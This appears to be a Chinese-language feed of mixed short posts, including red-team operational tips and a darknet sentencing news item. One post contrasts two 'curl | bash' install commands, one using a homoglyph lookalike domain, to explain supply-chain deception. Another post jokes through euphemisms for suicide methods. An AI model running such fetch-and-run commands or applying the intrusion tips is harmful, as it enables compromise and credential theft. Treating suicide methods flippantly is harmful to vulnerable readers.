【【Lazo Velko】有史以来最烂的编程语言-哔哩哔哩】 https://www.bilibili.com/video/BV1xYUtB5Evr?p=1&unique_k=2333

#开源项目
#Rust
tirith

仅凭肉眼，根本看不出下面两个curl命令的区别：

curl -sSL https://install.example-cli.dev | bash # safe
curl -sSL https://іnstall.example-clі.dev | bash # compromised

AI slop怎么在天上飞.jpg
​
1、红队大手子们vibe个爽的同时一定要练好自己的redteam ops基本功，安全还是太难了。
​2、不要在远控本机用http.server挂马，更不要在$HOME开。请选择noindex的http服务器。
​3、云环境哪怕开了安全组白名单也还是有很多信道可以用，注意各类脱离云自身RBAC体系运行的云服务，感觉是从aws开始搞云至今都存在的设计硬伤。AK异地调用告警/白名单很重要。
​4、Linux服务器比起Windows来的一个点是服务默认没有像LSASS这类的关键凭据管理，服务凭据作为文件或作为环境变量时，一个任意文件读就全偷走了。但要找服务器用的钥匙环，目前来说好像没什么很雅的方案，/proc/keys在应用级没什么人用，gnome-keyring天生对无头服务器不是很友好，SELinux天生对人类不是很友好。
​5、有些CWPP的文件蜜罐很弱智，你硬编码成这样，下次别人写勒索软件直接黑名单跳过。
​6、搞OSINT和高级威胁情报分析的人外语一定要好，不然本来是小贼，一份AI史lop境外境内来回搬，搞得跟捅了什么APT老挝似的。

【15岁高中生推翻了牛顿爱因斯坦的理论，自己构造了新的逻辑体系。-哔哩哔哩】 https://www.bilibili.com/video/BV1LVk3BaE8R?p=1&unique_k=2333

#民科TV

最近脑雾的感觉越来越严重了 主包要开始探索ADHD补剂了

现在距离2026年普通高等学校招生全国统一考试还有122天

日月忽其不淹兮，春与秋其代序

宝塔这个面板备份也是猎奇 一天比一天大 还不会自动删除 今天机器突然报警我才发现把我硬盘吃完了

他妈的 这个备份解压能有3g

看明白了 宝塔入侵检测的log会拉在panel被一起备份 偏偏这玩意log一天有500m

台湾籍青年因经营暗网遭重判30年监禁

本周二，台湾籍青年林睿庠因经营“Incognito Market”被判处三十年监禁，据检方称，该暗网平台在2020年至2024年间销售了价值超过1.05亿美元的毒品，包括超过1000公斤可卡因、超过1000公斤甲基苯丙胺、数百公斤其他毒品以及超过4公斤所谓的 ‘羟考酮’。纽约南区联邦检察官杰伊·克莱顿于周二宣布了此项判决，称林睿庠为“全球罪行最多产的毒贩之一”，其从加密货币交易中抽取5%作为“资金中介”佣金，同时使买卖双方彼此匿名。一名美国联邦调查局调查员表示，他们之所以能确认林睿庠为运营者，是因为林睿庠在注册域名时使用了真实姓名和地址。

—— Theverge

笑尿了

我们不说跳楼，我们说生命掷地有声
我们不说坠机，我们说生命随风聚散
我们不说喝药，我们说生命草木欣荣
我们不说烧炭，我们说生命飞蛾扑火
我们不说自溺，我们说万物终归海
我们不说悬梁，我们说自挂东南枝